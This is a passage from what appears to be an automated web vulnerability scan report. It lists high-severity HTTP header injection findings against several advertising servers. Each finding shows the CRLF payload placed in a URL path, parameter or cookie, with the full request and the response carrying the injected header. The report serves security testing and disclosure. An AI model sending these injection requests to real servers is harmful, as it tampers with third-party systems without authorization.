.16;btg=qc.a;ord=$cacheBuster$? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e2dd
aa7cb3ecbf6
/cm.drudgerep/;net=cm;u=,cm-47449671_1297649419,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.health_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af:
Date: Mon, 14 Feb 2011 02:10:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.29. http://ad.doubleclick.net/adj/drudgereport.ilm/remnant [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/drudgereport.ilm/remnant

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 697e6%0d%0a706ed09c5de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /697e6%0d%0a706ed09c5de/drudgereport.ilm/remnant;;tile=1;sz=728x90;ord= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff901.js&size_id=15&account_id=6005&site_id=12414&size=300x250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/697e6
706ed09c5de
/drudgereport.ilm/remnant;;tile=1;sz=728x90;ord=:
Date: Mon, 14 Feb 2011 01:52:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.30. http://ad.doubleclick.net/adj/pmv.inm.ind/news_home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pmv.inm.ind/news_home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 93ccd%0d%0a389a982e7d5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /93ccd%0d%0a389a982e7d5/pmv.inm.ind/news_home;tile=2;sz=300x250;click=http%3A//adserver.adtech.de/adlink%7C979%7C2440402%7C0%7C529%7CAdId%3D2789559%3BBnId%3D3%3Bitime%3D647360380%3Bkey%3Dworafr%3Blink%3D;ord=647360380? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/93ccd
389a982e7d5
/pmv.inm.ind/news_home;tile=2;sz=300x250;click=http: //adserver.adtech.de/adlink|979|2440402|0|529|AdId=2789559;BnId=3;itime=647360380;key=worafr;link=;ord=647360380
Date: Mon, 14 Feb 2011 01:37:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.31. http://ad.doubleclick.net/adj/resn.173878/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/resn.173878/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1c8c4%0d%0a0177437432c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1c8c4%0d%0a0177437432c/resn.173878/;alias=epcv0111a;sz=300x250;click=http://yads.zedo.com/ads2/c?a%3D893172%3Bx%3D2333%3Bg%3D172%3Bc%3D794000529%2C794000529%3Bi%3D0%3Bn%3D794%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D5%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.7725227591581643%3Bk%3D;ord=0.7283410648815334? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1c8c4
0177437432c
/resn.173878/;alias=epcv0111a;sz=300x250;click=http: //yads.zedo.com/ads2/c
Date: Mon, 14 Feb 2011 01:37:18 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.32. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.reuters/news/lifestyle/article

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 60afd%0d%0a8f5fec5b5f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /60afd%0d%0a8f5fec5b5f5/uk.reuters/news/lifestyle/article;type=leaderboard;sz=728x90;tile=1;articleID=UKTRE71C1YB20110213;ord=11111313525264? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/60afd
8f5fec5b5f5
/uk.reuters/news/lifestyle/article;type=leaderboard;sz=728x90;tile=1;articleID=UKTRE71C1YB20110213;ord=11111313525264:
Date: Mon, 14 Feb 2011 01:36:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.33. http://ad.doubleclick.net/adj/wpni.politics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c397%0d%0a667e0f07fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c397%0d%0a667e0f07fb/wpni.politics;ad=lb;sz=728x90;pos=ad1;poe=yes;dcopt=ist;ad=pop;ad=interstitial;orbit=y;del=js;t=y;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=disaster;cn=yes;pnode=politics;tile=1;ord=407276147045195100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c397
667e0f07fb
/wpni.politics;ad=lb;sz=728x90;pos=ad1;poe=yes;dcopt=ist;ad=pop;ad=interstitial;orbit=y;del=js;t=y;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=disaster;cn=yes;pnode=politics;tile=1;ord=40727:
Date: Mon, 14 Feb 2011 01:35:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.34. http://ad.doubleclick.net/adj/wpni.politics/inlinead [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics/inlinead

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53d32%0d%0a19fe23f2faf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53d32%0d%0a19fe23f2faf/wpni.politics/inlinead;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=intrusive;!c=disaster;cn=yes;pnode=politics;tile=3;ord=407276147045195100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53d32
19fe23f2faf
/wpni.politics/inlinead;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=intrusive;!c=disaster;cn=yes;pnode=politics;tile=3;ord=40727614:
Date: Mon, 14 Feb 2011 01:38:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.35. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 51fdf%0d%0aa355c11c9ff was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=862189&site=287822477&code=51fdf%0d%0aa355c11c9ff HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://redcated/UNY/iview/287822477/direct/035244?click=http://www.burstnet.com/ads/ad11961a-map.cgi/BCPG176307.255935.305394/VTS=2FHwU.8ZAY/SZ=120X600A|160X600A/V=2.3S//REDIRURL=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 02:16:54 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:53 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1_862189-1-1; expires=Thu, 05-Apr-2012 18:16:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2_862189-9zquM-0; expires=Thu, 05-Apr-2012 18:16:54 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=862189&site=4-287822477-&code=51fdf
a355c11c9ff

Content-Length: 33
Content-Type: text/html

/* /adsc/d862189/4/-1/randm.js */

2.36. http://amch.questionmarket.com/adscgen/sta.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e6b37%0d%0aa14210b269c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=862189&site=287822477&code=19855/e6b37%0d%0aa14210b269c4186 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://redcated/UNY/iview/287822477/direct/035244?click=http://www.burstnet.com/ads/ad11961a-map.cgi/BCPG176307.255935.305394/VTS=2FHwU.8ZAY/SZ=120X600A|160X600A/V=2.3S//REDIRURL=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 02:16:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1_862189-1-1; expires=Thu, 05-Apr-2012 18:16:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2_862189-AzquM-0; expires=Thu, 05-Apr-2012 18:16:55 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=862189&site=4-287822477-&code=19855/e6b37
a14210b269c
4186
Content-Length: 33
Content-Type: text/html

/* /adsc/d862189/4/-1/randm.js */

2.37. http://bidder.mathtag.com/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload b7a2e%0d%0a2669694ed50 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=b7a2e%0d%0a2669694ed50&id=5aW95q2jLzEvWlRabVlUbGxaVGt0WXpJeU55MDBOalF3TFRsbU5XRXRObVZpWkRFNE9USXhPREF4L05HUXpOekF5WW1NdE9ETTVaUzB3Tmprd0xUVXpOekF0TTJNeE9XRTVOVFl4TWprMS81OTM0NDM1NTMxNzIwNzUzMS8xMDk0NDkvMTAxNzcyLzUvbThsREliU1ZlNzdkUGpqWXBkdTFCZkNVNWFKNUNxdlZJZHc1OFcxRHRPOC8/G30W_HpUDJzTo5VAvU0finu0Bsc&price=AAABLiHmeN0RSsxpo1GHObFhTeUvm0-oCOAPtQ HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=10001:1297389082|1:1297088631|10004:1297088634|11:1297045671|2:1297087036|3:1297045592|4:1296924138|5:1297087118|9:1297087161; uuid=4d3702bc-839e-0690-5370-3c19a9561295; ts=1297647383

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 02:01:37 GMT
Server: MMBD/3.4.3.2
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - b7a2e
2669694ed50

x-mm-host: ewr-bidder-x2
Connection: keep-alive

Request not found

2.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 37f57%0d%0a3fb48ff6f67 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2204319&PluID=0&w=728&h=90&ord=121268265541127022&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=121268265541127022&mt_id=109450&mt_adid=100341&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hABkhFwA1TX4AAAAAAP9.HwAAAAAAAAAAAAYAAAAAAA8AAwABFH32IwAAAAAARqMHAAAAAADDeikAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABeAQ8AAAAAAAIAAwAAAAAAw.UoXI-i8z9cukkMAqv-PwEAAAAAAAVAZmZmZmZmEEABAAAAAAAFQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACy4jPc7mqhCV1QdvLC4KD5ygPw8Rr.jBeWye7lAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D728x90%26s%3D1515801%26r%3D1%26_salt%3D1804486375%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,6fcbc4c0-37da-11e0-8341-003048d6d89e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=037f57%0d%0a3fb48ff6f67

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=037f57
3fb48ff6f67
; expires=Sat, 14-May-2011 20: 33:39 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gPVtafzY0bnA00001gSdsafy50aSU00003gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000Sf+JvabEk02WG00002fFb9afAF02WG00001gDQzahdw07ZZ00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeaf5V0c9M00001heXfagzX0c9M00001gy3.ach00c9M00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXgagXR0c9M00002heXhahnN0c9M00004gK8raeXe0aA900001gSdmafy60aSU00002heXiagzX0c9M00004heXjafWs0c9M00001gSdnafwN0aSU00003hbwIaeVY09SF00002gSdpafvK0aSU00001heXaaf9P0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001ge4Hack+0bM000001; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
